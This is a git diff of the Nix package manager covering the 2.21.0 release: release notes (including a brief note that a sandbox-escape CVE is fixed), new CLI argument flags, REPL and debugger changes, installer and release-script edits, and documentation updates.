diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md
index 75853ced7..9eb7a3265 100644
--- a/doc/manual/src/quick-start.md
+++ b/doc/manual/src/quick-start.md
@@ -34,7 +34,7 @@ For more in-depth information you are kindly referred to subsequent chapters.
lolcat: command not found
```
-1. Search for more packages on to try them out.
+1. Search for more packages on [search.nixos.org](https://search.nixos.org/) to try them out.
1. Free up storage space:
diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
new file mode 100644
index 000000000..75114f117
--- /dev/null
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -0,0 +1,302 @@
+# Release 2.21.0 (2024-03-11)
+
+- Fix a fixed-output derivation sandbox escape (CVE-2024-27297)
+
+ Cooperating Nix derivations could send file descriptors to files in the Nix
+ store to each other via Unix domain sockets in the abstract namespace. This
+ allowed one derivation to modify the output of the other derivation, after Nix
+ has registered the path as "valid" and immutable in the Nix database.
+ In particular, this allowed the output of fixed-output derivations to be
+ modified from their expected content.
+
+ This isn't the case any more.
+
+- CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
+
+ The new CLI option `--arg-from-file` *name* *path* passes the contents
+ of file *path* as a string value via the function argument *name* to a
+ Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+ reads the contents of the string from standard input.
+
+- Concise error printing in `nix repl` [#9928](https://github.com/NixOS/nix/pull/9928)
+
+ Previously, if an element of a list or attribute set threw an error while
+ evaluating, `nix repl` would print the entire error (including source location
+ information) inline. This output was clumsy and difficult to parse:
+
+ ```
+ nix-repl> { err = builtins.throw "uh oh!"; }
+ { err = «error:
+ … while calling the 'throw' builtin
+ at «string»:1:9:
+ 1| { err = builtins.throw "uh oh!"; }
+ | ^
+
+ error: uh oh!»; }
+ ```
+
+ Now, only the error message is displayed, making the output much more readable.
+ ```
+ nix-repl> { err = builtins.throw "uh oh!"; }
+ { err = «error: uh oh!»; }
+ ```
+
+ However, if the whole expression being evaluated throws an error, source
+ locations and (if applicable) a stack trace are printed, just like you'd expect:
+
+ ```
+ nix-repl> builtins.throw "uh oh!"
+ error:
+ … while calling the 'throw' builtin
+ at «string»:1:1:
+ 1| builtins.throw "uh oh!"
+ | ^
+
+ error: uh oh!
+ ```
+
+- `--debugger` can now access bindings from `let` expressions [#8827](https://github.com/NixOS/nix/issues/8827) [#9918](https://github.com/NixOS/nix/pull/9918)
+
+ Breakpoints and errors in the bindings of a `let` expression can now access
+ those bindings in the debugger. Previously, only the body of `let` expressions
+ could access those bindings.
+
+- Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set [#9914](https://github.com/NixOS/nix/pull/9914)
+
+ If the `debugger-on-trace` option is set and `--debugger` is given,
+ `builtins.trace` calls will behave similarly to `builtins.break` and will enter
+ the debug REPL. This is useful for determining where warnings are being emitted
+ from.
+
+- Debugger prints source position information [#9913](https://github.com/NixOS/nix/pull/9913)
+
+ The `--debugger` now prints source location information, instead of the
+ pointers of source location information. Before:
+
+ ```
+ nix-repl> :bt
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ 0x600001522598
+ ```
+
+ After:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+ 131|
+ 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+ | ^
+ 133| in
+ ```
+
+- The `--debugger` will start more reliably in `let` expressions and function calls [#6649](https://github.com/NixOS/nix/issues/6649) [#9917](https://github.com/NixOS/nix/pull/9917)
+
+ Previously, if you attempted to evaluate this file with the debugger:
+
+ ```nix
+ let
+ a = builtins.trace "before inner break" (
+ builtins.break "hello"
+ );
+ b = builtins.trace "before outer break" (
+ builtins.break a
+ );
+ in
+ b
+ ```
+
+ Nix would correctly enter the debugger at `builtins.break a`, but if you asked
+ it to `:continue`, it would skip over the `builtins.break "hello"` expression
+ entirely.
+
+ Now, Nix will correctly enter the debugger at both breakpoints.
+
+- Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
+
+ Previously, evaluating an expression that throws an error in the debugger would
+ enter a second, nested debugger:
+
+ ```
+ nix-repl> builtins.throw "what"
+ error: what
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.18.1. Type :? for help.
+
+ nix-repl>
+ ```
+
+ Now, it just prints the error message like `nix repl`:
+
+ ```
+ nix-repl> builtins.throw "what"
+ error:
+ … while calling the 'throw' builtin
+ at «string»:1:1:
+ 1| builtins.throw "what"
+ | ^
+
+ error: what
+ ```
+
+- Consistent order of function arguments in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+
+ Function arguments are now printed in lexicographic order rather than the internal, creation-time based symbol order.
+
+- Fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+
+ When an `inherit` caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+
+- `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
+
+ `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+ This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
+
+- Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
+
+ Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
+ From now on, leading periods are supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+
+ Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
+
+- `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
+
+ `nix repl` will now pretty-print values:
+
+ ```
+ {
+ attrs = {
+ a = {
+ b = {
+ c = { };
+ };
+ };
+ };
+ list = [ 1 ];
+ list' = [
+ 1
+ 2
+ 3
+ ];
+ }
+ ```
+
+- Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade` [#10166](https://github.com/NixOS/nix/pull/10166)
+
+ Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
+ For instance:
+
+ ```
+ nix profile remove '.*vim.*'
+ ```
+
+ This would remove all packages that contain `vim` in their name.
+
+ In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes lead to unintended behavior. For instance, `python3.1` could match `python311`.
+
+ To avoid unintended behavior, the arguments are now only matching exact names.
+
+ Matching using regular expressions is still possible by using the new `--regex` flag:
+
+ ```
+ nix profile remove --regex '.*vim.*'
+ ```
+
+ One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+ ```
+ nix profile upgrade '.*'
+ ```
+
+ With the introduction of the `--all` flag, this now becomes more straightforward:
+
+ ```
+ nix profile upgrade --all
+ ```
+
+- Visual clutter in `--debugger` is reduced [#9919](https://github.com/NixOS/nix/pull/9919)
+
+ Before:
+ ```
+ info: breakpoint reached
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+ nix-repl> :continue
+ error: uh oh
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+ nix-repl>
+ ```
+
+ After:
+
+ ```
+ info: breakpoint reached
+
+ Nix 2.20.0pre20231222_dirty debugger
+ Type :? for help.
+ nix-repl> :continue
+ error: uh oh
+
+ nix-repl>
+ ```
+
+- Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
+
+ The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
+ else values are printed is now simpler and matches the cycle detection in
+ `nix-instantiate --eval` output.
+
+ Before:
+
+ ```
+ nix eval --expr 'let self = { inherit self; }; in self'
+ { self = { self = «repeated»; }; }
+ ```
+
+ After:
+
+ ```
+ { self = «repeated»; }
+ ```
+
+- In the debugger, `while evaluating the attribute` errors now include position information [#9915](https://github.com/NixOS/nix/pull/9915)
+
+ Before:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ 0x600001522598
+ ```
+
+ After:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+ 131|
+ 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+ | ^
+ 133| in
+ ```
+
+- Stack size is increased on macOS [#9860](https://github.com/NixOS/nix/pull/9860)
+
+ Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
+ stack size set to the default (approximately 8KiB) on macOS. Now, the stack
+ size is correctly set to 64MiB on macOS as well, which should reduce stack
+ overflow segfaults in deeply-recursive Nix expressions.
+
diff --git a/flake.nix b/flake.nix
index 42aaace67..89b928e83 100644
--- a/flake.nix
+++ b/flake.nix
@@ -31,7 +31,6 @@
crossSystems = [
"armv6l-unknown-linux-gnueabihf"
"armv7l-unknown-linux-gnueabihf"
- "x86_64-unknown-freebsd13"
"x86_64-unknown-netbsd"
];
@@ -299,8 +298,11 @@
''
type -p nix-env
# Note: we're filtering out nixos-install-tools because https://github.com/NixOS/nixpkgs/pull/153594#issuecomment-1020530593.
- time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
- [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+ (
+ set -x
+ time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
+ [[ $(sha1sum < packages | cut -c1-40) = e01b031fc9785a572a38be6bc473957e3b6faad7 ]]
+ )
mkdir $out
'';
@@ -341,7 +343,6 @@
checks = forAllSystems (system: {
binaryTarball = self.hydraJobs.binaryTarball.${system};
- perlBindings = self.hydraJobs.perlBindings.${system};
installTests = self.hydraJobs.installTests.${system};
nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system};
rl-next =
@@ -351,6 +352,11 @@
'';
} // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) {
dockerImage = self.hydraJobs.dockerImage.${system};
+ } // (lib.optionalAttrs (!(builtins.elem system linux32BitSystems))) {
+ # Some perl dependencies are broken on i686-linux.
+ # Since the support is only best-effort there, disable the perl
+ # bindings
+ perlBindings = self.hydraJobs.perlBindings.${system};
});
packages = forAllSystems (system: rec {
diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl
index 4e2c379f0..f2830a3af 100755
--- a/maintainers/upload-release.pl
+++ b/maintainers/upload-release.pl
@@ -11,6 +11,8 @@ use JSON::PP;
use LWP::UserAgent;
use Net::Amazon::S3;
+delete $ENV{'shell'}; # shut up a LWP::UserAgent.pm warning
+
my $evalId = $ARGV[0] or die "Usage: $0 EVAL-ID\n";
my $releasesBucketName = "nix-releases";
@@ -36,9 +38,9 @@ sub fetch {
my $evalUrl = "https://hydra.nixos.org/eval/$evalId";
my $evalInfo = decode_json(fetch($evalUrl, 'application/json'));
#print Dumper($evalInfo);
-my $flakeUrl = $evalInfo->{flake} or die;
-my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die);
-my $nixRev = $flakeInfo->{revision} or die;
+my $flakeUrl = $evalInfo->{flake};
+my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die) if $flakeUrl;
+my $nixRev = ($flakeInfo ? $flakeInfo->{revision} : $evalInfo->{jobsetevalinputs}->{nix}->{revision}) or die;
my $buildInfo = decode_json(fetch("$evalUrl/job/build.x86_64-linux", 'application/json'));
#print Dumper($buildInfo);
@@ -83,12 +85,19 @@ my $channelsBucket = $s3_us->bucket($channelsBucketName) or die;
sub getStorePath {
my ($jobName, $output) = @_;
my $buildInfo = decode_json(fetch("$evalUrl/job/$jobName", 'application/json'));
- return $buildInfo->{buildoutputs}->{$output or "out"}->{path} or die "cannot get store path for '$jobName'";
+ return $buildInfo->{buildoutputs}->{$output or "out"}->{path} // die "cannot get store path for '$jobName'";
}
sub copyManual {
- my $manual = getStorePath("build.x86_64-linux", "doc");
- print "$manual\n";
+ my $manual;
+ eval {
+ $manual = getStorePath("build.x86_64-linux", "doc");
+ };
+ if ($@) {
+ warn "$@";
+ return;
+ }
+ print "Manual: $manual\n";
my $manualNar = "$tmpDir/$releaseName-manual.nar.xz";
print "$manualNar\n";
@@ -154,19 +163,33 @@ downloadFile("binaryTarball.x86_64-linux", "1");
downloadFile("binaryTarball.aarch64-linux", "1");
downloadFile("binaryTarball.x86_64-darwin", "1");
downloadFile("binaryTarball.aarch64-darwin", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+eval {
+ downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
+eval {
+ downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
downloadFile("installerScript", "1");
# Upload docker images to dockerhub.
my $dockerManifest = "";
my $dockerManifestLatest = "";
+my $haveDocker = 0;
for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
my $system = $platforms->[0];
my $dockerPlatform = $platforms->[1];
my $fn = "nix-$version-docker-image-$dockerPlatform.tar.gz";
- downloadFile("dockerImage.$system", "1", $fn);
+ eval {
+ downloadFile("dockerImage.$system", "1", $fn);
+ };
+ if ($@) {
+ warn "$@" if $@;
+ next;
+ }
+ $haveDocker = 1;
print STDERR "loading docker image for $dockerPlatform...\n";
system("docker load -i $tmpDir/$fn") == 0 or die;
@@ -194,21 +217,23 @@ for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
$dockerManifestLatest .= " --amend $latestTag"
}
-print STDERR "creating multi-platform docker manifest...\n";
-system("docker manifest rm nixos/nix:$version");
-system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
-if ($isLatest) {
- print STDERR "creating latest multi-platform docker manifest...\n";
- system("docker manifest rm nixos/nix:latest");
- system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
-}
+if ($haveDocker) {
+ print STDERR "creating multi-platform docker manifest...\n";
+ system("docker manifest rm nixos/nix:$version");
+ system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
+ if ($isLatest) {
+ print STDERR "creating latest multi-platform docker manifest...\n";
+ system("docker manifest rm nixos/nix:latest");
+ system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
+ }
-print STDERR "pushing multi-platform docker manifest...\n";
-system("docker manifest push nixos/nix:$version") == 0 or die;
+ print STDERR "pushing multi-platform docker manifest...\n";
+ system("docker manifest push nixos/nix:$version") == 0 or die;
-if ($isLatest) {
- print STDERR "pushing latest multi-platform docker manifest...\n";
- system("docker manifest push nixos/nix:latest") == 0 or die;
+ if ($isLatest) {
+ print STDERR "pushing latest multi-platform docker manifest...\n";
+ system("docker manifest push nixos/nix:latest") == 0 or die;
+ }
}
# Upload nix-fallback-paths.nix.
diff --git a/mk/cxx-big-literal.mk b/mk/cxx-big-literal.mk
index 85365df8e..d64a171c8 100644
--- a/mk/cxx-big-literal.mk
+++ b/mk/cxx-big-literal.mk
@@ -1,5 +1,5 @@
%.gen.hh: %
- @echo 'R"foo(' >> $@.tmp
+ @echo 'R"__NIX_STR(' >> $@.tmp
$(trace-gen) cat $< >> $@.tmp
- @echo ')foo"' >> $@.tmp
+ @echo ')__NIX_STR"' >> $@.tmp
@mv $@.tmp $@
diff --git a/package.nix b/package.nix
index 20796a386..7d9a39771 100644
--- a/package.nix
+++ b/package.nix
@@ -24,6 +24,7 @@
, libgit2
, libseccomp
, libsodium
+, man
, lowdown
, mdbook
, mdbook-linkcheck
@@ -213,6 +214,7 @@ in {
git
mercurial
openssh
+ man # for testing `nix-* --help`
] ++ lib.optionals (doInstallCheck || enableManual) [
jq # Also for custom mdBook preprocessor.
] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
@@ -341,15 +343,22 @@ in {
# Work around weird bug where it doesn't think there is a Makefile.
installCheckPhase = if (!doBuild && doInstallCheck) then ''
+ runHook preInstallCheck
mkdir -p src/nix-channel
make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES
'' else null;
# Needed for tests if we are not doing a build, but testing existing
# built Nix.
- preInstallCheck = lib.optionalString (! doBuild) ''
- mkdir -p src/nix-channel
- '';
+ preInstallCheck =
+ lib.optionalString (! doBuild) ''
+ mkdir -p src/nix-channel
+ ''
+ # See https://github.com/NixOS/nix/issues/2523
+ # Occurs often in tests since https://github.com/NixOS/nix/pull/9900
+ + lib.optionalString stdenv.hostPlatform.isDarwin ''
+ export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
+ '';
separateDebugInfo = !stdenv.hostPlatform.isStatic;
diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..ad3ee8881 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,31 +58,6 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
readonly ROOT_HOME=~root
-readonly PROXY_ENVIRONMENT_VARIABLES=(
- http_proxy
- https_proxy
- ftp_proxy
- no_proxy
- HTTP_PROXY
- HTTPS_PROXY
- FTP_PROXY
- NO_PROXY
-)
-
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
-
-setup_sudo_extra_environment_variables() {
- local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
- for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
- if [ "x${!variable:-}" != "x" ]; then
- SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
- i=$((i + 1))
- fi
- done
-}
-
-setup_sudo_extra_environment_variables
-
if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
readonly IS_HEADLESS='no'
else
@@ -386,7 +361,7 @@ _sudo() {
if is_root; then
env "$@"
else
- sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+ sudo "$@"
fi
}
diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 444ff81c9..b87bbbc27 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -20,7 +20,7 @@ MixEvalArgs::MixEvalArgs()
.description = "Pass the value *expr* as the argument *name* to Nix functions.",
.category = category,
.labels = {"name", "expr"},
- .handler = {[&](std::string name, std::string expr) { autoArgs[name] = 'E' + expr; }}
+ .handler = {[&](std::string name, std::string expr) { autoArgs.insert_or_assign(name, AutoArg{AutoArgExpr(expr)}); }}
});
addFlag({
@@ -28,7 +28,24 @@ MixEvalArgs::MixEvalArgs()
.description = "Pass the string *string* as the argument *name* to Nix functions.",
.category = category,
.labels = {"name", "string"},
- .handler = {[&](std::string name, std::string s) { autoArgs[name] = 'S' + s; }},
+ .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
+ });
+
+ addFlag({
+ .longName = "arg-from-file",
+ .description = "Pass the contents of file *path* as the argument *name* to Nix functions.",
+ .category = category,
+ .labels = {"name", "path"},
+ .handler = {[&](std::string name, std::string path) { autoArgs.insert_or_assign(name, AutoArg{AutoArgFile(path)}); }},
+ .completer = completePath
+ });
+
+ addFlag({
+ .longName = "arg-from-stdin",
+ .description = "Pass the contents of stdin as the argument *name* to Nix functions.",
+ .category = category,
+ .labels = {"name"},
+ .handler = {[&](std::string name) { autoArgs.insert_or_assign(name, AutoArg{AutoArgStdin{}}); }},
});
addFlag({
@@ -154,13 +171,23 @@ MixEvalArgs::MixEvalArgs()
Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
{
auto res = state.buildBindings(autoArgs.size());
- for (auto & i : autoArgs) {
+ for (auto & [name, arg] : autoArgs) {
auto v = state.allocValue();
- if (i.second[0] == 'E')
- state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(".")));
- else
- v->mkString(((std::string_view) i.second).substr(1));
- res.insert(state.symbols.create(i.first), v);
+ std::visit(overloaded {
+ [&](const AutoArgExpr & arg) {
+ state.mkThunk_(*v, state.parseExprFromString(arg.expr, state.rootPath(".")));
+ },
+ [&](const AutoArgString & arg) {
+ v->mkString(arg.s);
+ },
+ [&](const AutoArgFile & arg) {
+ v->mkString(readFile(arg.path));
+ },
+ [&](const AutoArgStdin & arg) {
+ v->mkString(readFile(STDIN_FILENO));
+ }
+ }, arg);
+ res.insert(state.symbols.create(name), v);
}
return res.finish();
}
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2eb63e15d..25ce5b9da 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -6,6 +6,8 @@
#include "common-args.hh"
#include "search-path.hh"
+#include
+
namespace nix {
class Store;
@@ -26,7 +28,14 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
std::optional evalStoreUrl;
private:
- std::map autoArgs;
+ struct AutoArgExpr { std::string expr; };
+ struct AutoArgString { std::string s; };
+ struct AutoArgFile { std::filesystem::path path; };
+ struct AutoArgStdin { };
+
+ using AutoArg = std::variant;
+
+ std::map autoArgs;
};
SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr);
diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index 16d25d3cf..6db9bf9a1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -21,6 +21,7 @@
#include "url.hh"
#include "registry.hh"
#include "build-result.hh"
+#include "fs-input-accessor.hh"
#include
#include
@@ -146,7 +147,7 @@ MixFlakeOptions::MixFlakeOptions()
.category = category,
.labels = {"flake-lock-path"},
.handler = {[&](std::string lockFilePath) {
- lockFlags.referenceLockFilePath = lockFilePath;
+ lockFlags.referenceLockFilePath = getUnfilteredRootPath(CanonPath(absPath(lockFilePath)));
}},
.completer = completePath
});
@@ -442,10 +443,10 @@ ref openEvalCache(
EvalState & state,
std::shared_ptr lockedFlake)
{
- auto fingerprint = lockedFlake->getFingerprint();
+ auto fingerprint = lockedFlake->getFingerprint(state.store);
return make_ref(
evalSettings.useEvalCache && evalSettings.pureEval
- ? std::optional { std::cref(fingerprint) }
+ ? fingerprint
: std::nullopt,
state,
[&state, lockedFlake]()
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..a79d7c482 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -123,7 +123,8 @@ struct NixRepl
.force = true,
.derivationPaths = true,
.maxDepth = maxDepth,
- .prettyIndent = 2
+ .prettyIndent = 2,
+ .errors = ErrorPrintBehavior::ThrowTopLevel,
});
}
};
@@ -336,13 +337,7 @@ ReplExitStatus NixRepl::mainLoop()
printMsg(lvlError, e.msg());
}
} catch (EvalError & e) {
- // in debugger mode, an EvalError should trigger another repl session.
- // when that session returns the exception will land here. No need to show it again;
- // show the error for this repl session instead.
- if (state->debugRepl && !state->debugTraces.empty())
- showDebugTrace(std::cout, state->positions, state->debugTraces.front());
- else
- printMsg(lvlError, e.msg());
+ printMsg(lvlError, e.msg());
} catch (Error & e) {
printMsg(lvlError, e.msg());
} catch (Interrupted & e) {
@@ -548,6 +543,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
<< " :l, :load Load Nix expression and add it to scope\n"
<< " :lf, :load-flake [ Load Nix flake and add it to scope\n"
<< " :p, :print Evaluate and print expression recursively\n"
+ << " Strings are printed directly, without escaping.\n"
<< " :q, :quit Exit nix-repl\n"
<< " :r, :reload Reload all files\n"
<< " :sh Build dependencies of derivation, then start\n"
@@ -755,7 +751,11 @@ ProcessLineResult NixRepl::processLine(std::string line)
else if (command == ":p" || command == ":print") {
Value v;
evalString(arg, v);
- printValue(std::cout, v);
+ if (v.type() == nString) {
+ std::cout << v.string_view();
+ } else {
+ printValue(std::cout, v);
+ }
std::cout << std::endl;
}
diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index b5783d28f..c5581b9ff 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -21,11 +21,24 @@ struct EvalSettings : Config
Setting nixPath{
this, getDefaultNixPath(), "nix-path",
R"(
- List of directories to be searched for `<...>` file references
+ List of search paths to use for [lookup path](@docroot@/language/constructs/lookup-path.md) resolution.
+ This setting determines the value of
+ [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath) and can be used with [`builtins.findFile`](@docroot@/language/builtin-constants.md#builtins-findFile).
- In particular, outside of [pure evaluation mode](#conf-pure-eval), this determines the value of
- [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath).
- )"};
+ The default value is
+
+ ```
+ $HOME/.nix-defexpr/channels
+ nixpkgs=$NIX_STATE_DIR/profiles/per-user/root/channels/nixpkgs
+ $NIX_STATE_DIR/profiles/per-user/root/channels
+ ```
+
+ It can be overridden with the [`NIX_PATH` environment variable](@docroot@/command-ref/env-common.md#env-NIX_PATH) or the [`-I` command line option](@docroot@/command-ref/opt-common.md#opt-I).
+
+ > **Note**
+ >
+ > If [pure evaluation](#conf-pure-eval) is enabled, `nixPath` evaluates to the empty list `[ ]`.
+ )", {}, false};
Setting currentSystem{
this, "", "eval-system",
@@ -55,8 +68,6 @@ struct EvalSettings : Config
[`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath),
or to URIs outside of
[`allowed-uris`](@docroot@/command-ref/conf-file.md#conf-allowed-uris).
-
- Also the default value for [`nix-path`](#conf-nix-path) is ignored, such that only explicitly set search path entries are taken into account.
)"};
Setting pureEval{this, false, "pure-eval",
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index f2bbf20bb..bbccfcd29 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -762,10 +762,24 @@ std::unique_ptr mapStaticEnvBindings(const SymbolTable & st, const Stati
return vm;
}
+/**
+ * Sets `inDebugger` to true on construction and false on destruction.
+ */
+class DebuggerGuard {
+ bool & inDebugger;
+public:
+ DebuggerGuard(bool & inDebugger) : inDebugger(inDebugger) {
+ inDebugger = true;
+ }
+ ~DebuggerGuard() {
+ inDebugger = false;
+ }
+};
+
void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & expr)
{
- // double check we've got the debugRepl function pointer.
- if (!debugRepl)
+ // Make sure we have a debugger to run and we're not already in a debugger.
+ if (!debugRepl || inDebugger)
return;
auto dts =
@@ -792,6 +806,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
auto se = getStaticEnv(expr);
if (se) {
auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
+ DebuggerGuard _guard(inDebugger);
auto exitStatus = (debugRepl)(ref(shared_from_this()), *vm);
switch (exitStatus) {
case ReplExitStatus::QuitAll:
@@ -934,12 +949,11 @@ void EvalState::mkThunk_(Value & v, Expr * expr)
void EvalState::mkPos(Value & v, PosIdx p)
{
- auto pos = positions[p];
- if (auto path = std::get_if(&pos.origin)) {
+ auto origin = positions.originOf(p);
+ if (auto path = std::get_if(&origin)) {
auto attrs = buildBindings(3);
attrs.alloc(sFile).mkString(path->path.abs());
- attrs.alloc(sLine).mkInt(pos.line);
- attrs.alloc(sColumn).mkInt(pos.column);
+ makePositionThunks(*this, p, attrs.alloc(sLine), attrs.alloc(sColumn));
v.mkAttrs(attrs);
} else
v.mkNull();
@@ -2762,9 +2776,12 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv)
{
- auto s = make_ref(std::move(s_));
- s->append("\0\0", 2);
- return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv);
+ // NOTE this method (and parseStdin) must take care to *fully copy* their input
+ // into their respective Pos::Origin until the parser stops overwriting its input
+ // data.
+ auto s = make_ref(s_);
+ s_.append("\0\0", 2);
+ return parse(s_.data(), s_.size(), Pos::String{.source = s}, basePath, staticEnv);
}
@@ -2776,12 +2793,15 @@ Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath
Expr * EvalState::parseStdin()
{
+ // NOTE this method (and parseExprFromString) must take care to *fully copy* their
+ // input into their respective Pos::Origin until the parser stops overwriting its
+ // input data.
//Activity act(*logger, lvlTalkative, "parsing standard input");
auto buffer = drainFD(0);
// drainFD should have left some extra space for terminators
buffer.append("\0\0", 2);
- auto s = make_ref(std::move(buffer));
- return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
+ auto s = make_ref(buffer);
+ return parse(buffer.data(), buffer.size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
}
